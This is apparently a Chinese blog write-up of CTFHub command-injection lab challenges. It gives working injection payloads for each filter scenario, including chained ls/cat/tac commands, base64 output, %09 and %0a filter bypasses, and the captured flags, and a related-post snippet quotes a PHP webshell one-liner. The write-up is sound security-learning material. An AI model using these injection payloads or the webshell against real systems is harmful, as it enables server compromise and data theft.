CTFhub RCE解题思路

已于 2022-05-18 11:16:34 修改
阅读量532 收藏 2
点赞数 2
文章标签: php 开发语言
于 2022-05-16 17:11:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kindyyy/article/details/124779570
版权
本文详细介绍了在不同过滤条件下如何利用命令注入漏洞获取flag,包括无过滤、过滤特定命令、过滤空格、过滤目录分隔符以及过滤运算符等场景,通过实例演示了如何使用ls、cat、tac、base64等工具进行绕过并提取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

命令注入——无过滤

先让我们来明确一下知识点:

 先打开题目:

没有过滤,那就直接下命令

127.0.0.1;ls 

127.0.0.1;cat 249871313820494.php

我试了一下,发现里面什么都没有,可能是被过滤了,用|连接base64编码试一下

127.0.0.1;cat 249871313820494.php|base64

发现了flag,用base64解码试一试 

得到flag

过滤cat

打开题目:

用一样的方式命令:

127.0.0.1;ls

 发现有flag存在的php文件:但是题目说已经过滤了cat,所以就用tac来切换cat(我是这样做的,但是切换cat的方式有好多种,我只试出了这一种,其他的都没办法得到flag)

127.0.0.1;tac /flag|base64

 再用base64解码就可以得到flag

ctfhub{3e7bd9a80a0190d9ae107a50}

过滤空格

打开题目,发现空格被过滤,我建议是在url中直接输入

127.0.0.1;ls

 有一个含有flag的php文件,接着一步一步来,空格的话可以用%09;%20,/**/,<>,还有很多

http://challenge-542ccfdba3055daa.sandbox.ctfhub.com:10800/?ip=127.0.0.1;cat%09flag_234022699112599.php

再用ctrl+u查看源码,里面就有flag

 过滤目录分隔符

打开题目,发现/被过滤了,不能使用了,那没事我们也可以一步一步来

127.0.0.1;ls

再打开文件夹,文件夹也要用ls打开

127.0.0.1;ls flag_is_here

 

先让我们把目录定位到 flag_is_here的文件夹中,再打开含有flag的文件

127.0.0.1;cd flag_is_here;cat flag_3082496671458.php

被隐藏起来了,看一看源码吧 

发现了flag 

ctfhub{d1f04a1b8e99b42ee54e9778}

过滤运算符

我发现其实它过滤的和我用的没有太大的联系(不是),打开题目,发现他过滤了管道运算符|还有&,也不影响我们做题!

127.0.0.1;ls

127.0.0.1;cat flag_1400626919913.php

再利用CTRL+u查看源码即可 

 flag:

ctfhub{f10d29a9090febb04a371ada}

 综合练习

过滤了好多东西,用%0a绕过;

http://challenge-581e8d31cf4f3db7.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0als#

http://challenge-581e8d31cf4f3db7.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0Acd%09f*_is_here%0atac%09f*_259632229715423.p*p#

 再查看源码即可获得flag

ctfhub{f9cd583fcf4858c28ba70974}

kindyyy
关注
【网络安全 | CTF】攻防世界 php_rce 解题详析
等风来
05-22 7812
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
网安知识系列:网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
weixin_54626591的博客
09-12 563
网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
RCE的题目解析
Q221022的博客
11-19 3807
1.ping一个ip; 先搭建一个靶场,将pikachu-master放在根目录下,在网页中打开 ping ping是Packet Internet Groper,用于测试网络连接量的程序,ping是用来检测网络是否通畅或者网络连接速度的命令。ping命令发送数据使用的是ICMP的协议 ping127.0.0.1(是为了检查本地的TCP/IP协议有没有设置好) ping 本机IP地址,是为了检查本机的IP地址是否设置有误(本机IP为10.128.202.7) 查看当前目录 ...
rce题目解析
2201_75327657的博客
03-06 311
表示|前面命令语句的输出,作为|后面命令语句的输入执行。当|前面为false的时候将不会执行。然后用1.1.1.1;|ls /(切记ls与/中间有空格,不然没反馈)查询目录。那就利用tac反向查看(是行数反过来不是内容反过来)输入后发现没有反应大概是被屏蔽了需要进行反处理。再利用cat查看,查看时发现又被屏蔽了。输入 1.1.1.1;可以先利用ls查看文件。
10.7CTFHub做题
cisansui的博客
10-07 199
CTFHub目录遍历 题目本身难度不大,点进靶机进入目录寻找就能够得到flag 学了相关目录遍历攻击的知识,整理了一篇心得 部分观点来源网络,侵删 一、目录遍历的含义 目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。当用户发起一个前端的请求时,便会将请求的这个文件的值(比如文件名称)传递到后台,后台再执行其对应的文件。
CTF中WEB题——RCE
tomyyyyy
10-31 6903
CTF中WEB题——RCE 目录CTF中WEB题——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
CTFHub-Web-RCE-文件包含
qq_54037445的博客
11-29 1075
文件包含,伪协议
ctfhub的题库RCE
12-28
### CTFHub平台上RCE题目的探索 对于希望深入研究远程代码执行(Remote Code Execution, RCE)挑战的人来说,CTFHub是一个非常有价值的资源。该平台提供了多种类型的题目来帮助参与者提高技能并了解最新的安全威胁...
CTFHUB----web前置技能-rce
最新发布
01-01
### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种...
第三届强网杯线上赛记录
T19er的博客
07-02 1544
** Misc 0x01 签到** flag{welcome_to_qwb_2019} 0x02 强网先锋-打野 解压出来是一个bmp文件 打开图片 又是cxk。。。 首先想到的是丢尽Stegsolve分析一波,感觉是lsb隐写,但看不出有什么端倪。 但能够确定的是隐写题目,于是百度一波,发现zsteg是一个可以检测png和bmp文件中隐藏数据的工具,于是安装zsteg分析一波。竟然发现了...
胡乱自学黑客的,能骂醒一个算一个
2401_84208172的博客
05-05 1084
为啥说胡乱自学黑客的,能骂醒一个算一个。因为很多人学会个工具就觉得自己是黑客了,其实再真正的黑客眼里,你就是个脚本小子而已。首先我谈下对黑客&网络安全的认知,其实最重要的是兴趣热爱,不同于网络安全工程师,他们大都是培训机构培训出来的,具备的基本都是防御和白帽子技能,他们绝大多数的人看的是工资,他们是为了就业而学习,为了走捷径才去参加培训。
[极客大挑战 2019]RCE ME buuctf 题目详解思路
weixin_73560599的博客
08-31 1110
非常经典的无字母数字RCE 且这套题目加了些过滤条件 不是特别难 只是有个disable_function 是需要注意的
CTFSHOW每周大挑战——RCE
qq_61955196的博客
11-21 3174
ctfshow的每周大挑战之RCE解题方法和一些问题的解决方法和个人总结。
CTFHub 技能树-- RCE(详解)
m0_62879498的博客
02-20 7284
CTFHubRCE RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统 eval执行文件 查看一开始的源代码: <?php if(isset($_REQUEST['cmd'])){ eval($_REQUEST['cmd']); } else{ highlight_file(__FILE__); } ?> php函数意思是: 是否由变量cmd 如果有,就执行eval($_REQUEST['cmd
CTFHUB学习题解Web(5)-RCE
独沐晨霖
07-31 1198
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行 文件包含 php://input 远程包含 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符
CTFHub远程执行RCE
m0_57379855的博客
03-17 1332
CTFHub远程执行RCEeval执行命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习文件包含php://input远程包含读取源代码 eval执行 命令注入 127.0.0.1;cat 121931294031970.php 127.0.0.1;cat 121931294031970.php|base64 获得flag 过滤cat 其他查看文件的命令 127.0.0.1;ls 127.0.0.1;less flag_198392751413959.php|base
CTFHUB 基础-----命令执行第一关
SopRomeo的博客
03-18 1313
cat 可以用,flag不在这里,找了很久都没有,最终发现可以写一句话木马进去 LINUX指令 看了web,发现要转义 1;echo "<?php @eval(\$_POST['cmd']);?>" > 2.php 不知道为啥要转义,可能linux指令要这样…或者过滤了 不能cat一大窜数字的文件,菜刀点进去看,里面有flag...
CTFHUB RCE 命令注入最后一题(传马解)
qq_51250415的博客
05-22 651
CTFhub命令注入最后一题:传马结题
CTFhub技能树_Web RCE
weixin_45897324的博客
10-11 1260
一、eval执行 1.分析: 打开网站显示如下代码: <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 大体意思是:判断cmd是否被设置,若cmd被赋值,则执行如下语句,否则就继续显示以上代码。 eval($_REQUEST["cmd"]); 其中: eval():该函数可以把字符串作为PHP代码执行 $_REQUEST['
ctfhub RCE
08-18
CTFHub RCE(Remote Code Execution)是指在CTFHub平台上利用漏洞或安全问题,远程执行恶意代码或命令的攻击行为。这种攻击通常会利用软件或网站存在的漏洞,通过远程执行代码来获取非授权的访问权限或对系统进行控制。 请注意,RCE是一种非法的攻击行为,严重侵犯了他人的隐私和系统安全。在任何情况下,我都不能提供关于如何进行RCE攻击的具体指导或支持。如果您对CTFHub或其他相关安全问题有任何合法的疑问或需求,请提供更具体的信息,我将尽力帮助您。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值